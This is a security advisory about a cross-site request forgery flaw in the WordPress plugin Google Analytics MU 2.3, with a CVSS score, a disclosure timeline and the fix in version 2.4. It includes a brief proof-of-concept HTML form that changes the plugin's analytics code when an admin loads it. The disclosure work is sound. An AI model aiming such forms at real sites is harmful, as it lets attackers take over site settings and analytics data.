CSRF in Google Analytics MU 2.3

Vulnerability

Last revised: February 26, 2014

If an admin visits a page of the attacker’s choosing then the plugin’s settings can be altered. This could cause a mild disruption by breaking analytics until the problem is noticed, or if the attacker substitutes an analytics code they own they could gain access to the analytics data until the organisation notices the problem.

There should be a nonce check around line 71 of google-analytics-mu.php and a nonce around line 86.

Current state: Fixed

CVSS Summary

CVSS base scores for this vulnerability
Score	5.8 Medium
Vector	Network
Complexity	Medium
Authentication	None
Confidentiality	Partial
Integrity	Partial
Availability	None

You can read more about CVSS base scores on Wikipedia or in the CVSS specification.

Proof of concept

A simple form which changes the analytics code to “abc”:

<form method="POST" action="http://localhost/wp-admin/network/settings.php?page=google-analytics-mu-network">
  <input type="text" name="UAIDsuper" value="abc">
  <input type="submit">
</form>

Advisory timeline

2014-02-19: Discovered
2014-02-26: Reported
2014-02-27: Vendor reports fixed

Mitigation/further actions

Update to version 2.4 or greater.

dxw advisories

Advisory: